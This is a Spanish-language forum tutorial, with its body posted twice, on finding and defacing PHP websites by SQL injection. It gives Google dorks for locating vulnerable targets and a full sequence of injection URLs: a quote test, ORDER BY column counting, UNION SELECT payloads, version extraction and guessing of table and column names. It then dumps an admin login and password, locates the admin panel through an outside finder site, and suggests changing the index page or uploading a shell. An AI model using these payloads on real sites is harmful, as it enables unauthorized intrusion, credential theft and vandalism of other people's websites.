Autor
Tutorial Sql Injection Version 4
Por: abdelhaklashab
En este manual aprenderemos a defacear una web .php por el método sql injection versión 4
Primero tenemos que buscar una web que sea vulnerable podemos utilizar estos dorks para uscar en goolge:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
2-bien aqui tenemos una web vulnerable
http://www.ejemplo.com/category.php?id=48
3- para saber si es vulnerbale borramos los números del final del link y ponemos una ‘
De modo que quede asi
http://www.ejemplo.com/category.php?id=’
si al hacer eso nos sale un error tipo asin
Error in query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND valid = '1' order by c_id' at line 1
bien ahora lo que haremos es buscar las columnas que tienen error
si no sale el error borramos el ‘ de mode que quede asi
http://www.ejemplo.com/category.php?id=
y ponemos
-1+order+by+100— al fianl del link
de modo que quede asi
http://www.ejemplo.com/category.php?id=1-order+by+100—
nos saldrá un error tipo asi /column '100' in 'order clause'
ahora lo que haremos será bajar de poco en poco hasta ver el numero donde no sale ese error
pa que me entiendan hay que hacer esto
http://www.ejemplo.com/category.php?id=-1+order+by+100--
sale el error bajamos 10 numero http://www.ejemplo.com/category.php?id=-1+order+by+90--
nos sigue saliendo el error volvemos a bajar
http://www.ejemplo.com/category.php?id=-1+order+by+80--
vamos bajarndo hasta que desaparesca el error en este caso
http://www.ejemplo.com/category.php?id=-1+order+by+15--
aki desaparece el error
bien ahora sabemos que hay 15 columnas con error
lo que tenemos que hacer ahora es
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
si en otro caso por ejemplo es 9 collumnas errores
www.example.es/categort.php?=-1+union+select+1,2,3,4,5,6,7,8,9--
bueno volvemos a nuestra web
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
damos a enter
nos saldrán en la pagina unos números en este caso el 1,9,6
estos son las columnas que podemos utilizar
bien nosotros utilizaremos el 9
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15--
vamos al numero 9 y ponemos versión()
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
nos saldrá
4.1.20-community-nt
Bien ahora lo que tenemos que hacer es esto
Vlvemos el link a su estado osea quitamos eso de versión()
Y volvemos a poner el 9
Antes
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
ahora que quede asi
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
bien el siguiente paso
hacemos esto
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--
este link lo que ara es darnos el nombre de usuario
pones +from+admin lo k utilizamos es (admin)
bien en este caso nos da error
bien ahora camiams admin por usuario
de modo que quede asi
from+usuario
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuario--
bien si en este caso nos da error vamos probando nombres hasta dar con uno
posibles nombres
admin,user,usuario,username,login,administradr,administrator…….
Depende de su imaginación
En este caso es admin
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--
bien no nos sale ningún nombre ni nungun error asi que el usuario es admin por defecto
ahora vamos a buscar la contraseña
os recordais de las columnas que tenían error
el 9,1,6 bien en estas columnas buscamos el pass
nosotros utilizaremos el 9 como siempre
también probaremos con
password,pass,contraseña,apass,entrada,loginpass,passw,passwo….vamos al 9 y vamos probando
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15+from+admin--
nos da error
vamos probando
en este caso es apass
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,apass,10,11,12,13,14,15+from+admin--
bien ya tenemos el admin y el pass
admin:admin
contraseña: gigio2001
ya tenemos lo básico ahora falta lo mas importante de todo la pagina de administración
normalmente suele ser
/admin
/administrador
Vamos probando pero lo mas rápido
Es entrar aquí http://mormoroth.net/af/
Ponemos la pagina web y nos dara la agina de administración
Ahora lo tenemos todo
En este caso es admin
http://www.ejemplo.com/admin/
ponemos el pass y admin
y a disfrutar
cambiamos el index , modificamos lo que queramos o subimos la Shell……….infinidad de opciones.
Esto es todo si teneis alguna duda enviarme un mp o dejar el comentario
Por:abdelhaklashab
Por: abdelhaklashab
En este manual aprenderemos a defacear una web .php por el método sql injection versión 4
Primero tenemos que buscar una web que sea vulnerable podemos utilizar estos dorks para uscar en goolge:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
2-bien aqui tenemos una web vulnerable
http://www.ejemplo.com/category.php?id=48
3- para saber si es vulnerbale borramos los números del final del link y ponemos una ‘
De modo que quede asi
http://www.ejemplo.com/category.php?id=’
si al hacer eso nos sale un error tipo asin
Error in query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND valid = '1' order by c_id' at line 1
bien ahora lo que haremos es buscar las columnas que tienen error
si no sale el error borramos el ‘ de mode que quede asi
http://www.ejemplo.com/category.php?id=
y ponemos
-1+order+by+100— al fianl del link
de modo que quede asi
http://www.ejemplo.com/category.php?id=1-order+by+100—
nos saldrá un error tipo asi /column '100' in 'order clause'
ahora lo que haremos será bajar de poco en poco hasta ver el numero donde no sale ese error
pa que me entiendan hay que hacer esto
http://www.ejemplo.com/category.php?id=-1+order+by+100--
sale el error bajamos 10 numero http://www.ejemplo.com/category.php?id=-1+order+by+90--
nos sigue saliendo el error volvemos a bajar
http://www.ejemplo.com/category.php?id=-1+order+by+80--
vamos bajarndo hasta que desaparesca el error en este caso
http://www.ejemplo.com/category.php?id=-1+order+by+15--
aki desaparece el error
bien ahora sabemos que hay 15 columnas con error
lo que tenemos que hacer ahora es
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
si en otro caso por ejemplo es 9 collumnas errores
www.example.es/categort.php?=-1+union+select+1,2,3,4,5,6,7,8,9--
bueno volvemos a nuestra web
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
damos a enter
nos saldrán en la pagina unos números en este caso el 1,9,6
estos son las columnas que podemos utilizar
bien nosotros utilizaremos el 9
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15--
vamos al numero 9 y ponemos versión()
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
nos saldrá
4.1.20-community-nt
Bien ahora lo que tenemos que hacer es esto
Vlvemos el link a su estado osea quitamos eso de versión()
Y volvemos a poner el 9
Antes
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
ahora que quede asi
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
bien el siguiente paso
hacemos esto
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--
este link lo que ara es darnos el nombre de usuario
pones +from+admin lo k utilizamos es (admin)
bien en este caso nos da error
bien ahora camiams admin por usuario
de modo que quede asi
from+usuario
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuario--
bien si en este caso nos da error vamos probando nombres hasta dar con uno
posibles nombres
admin,user,usuario,username,login,administradr,administrator…….
Depende de su imaginación
En este caso es admin
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--
bien no nos sale ningún nombre ni nungun error asi que el usuario es admin por defecto
ahora vamos a buscar la contraseña
os recordais de las columnas que tenían error
el 9,1,6 bien en estas columnas buscamos el pass
nosotros utilizaremos el 9 como siempre
también probaremos con
password,pass,contraseña,apass,entrada,loginpass,passw,passwo….vamos al 9 y vamos probando
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15+from+admin--
nos da error
vamos probando
en este caso es apass
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,apass,10,11,12,13,14,15+from+admin--
bien ya tenemos el admin y el pass
admin:admin
contraseña: gigio2001
ya tenemos lo básico ahora falta lo mas importante de todo la pagina de administración
normalmente suele ser
/admin
/administrador
Vamos probando pero lo mas rápido
Es entrar aquí http://mormoroth.net/af/
Ponemos la pagina web y nos dara la agina de administración
Ahora lo tenemos todo
En este caso es admin
http://www.ejemplo.com/admin/
ponemos el pass y admin
y a disfrutar
cambiamos el index , modificamos lo que queramos o subimos la Shell……….infinidad de opciones.
Esto es todo si teneis alguna duda enviarme un mp o dejar el comentario
Por:abdelhaklashab
En línea
- 
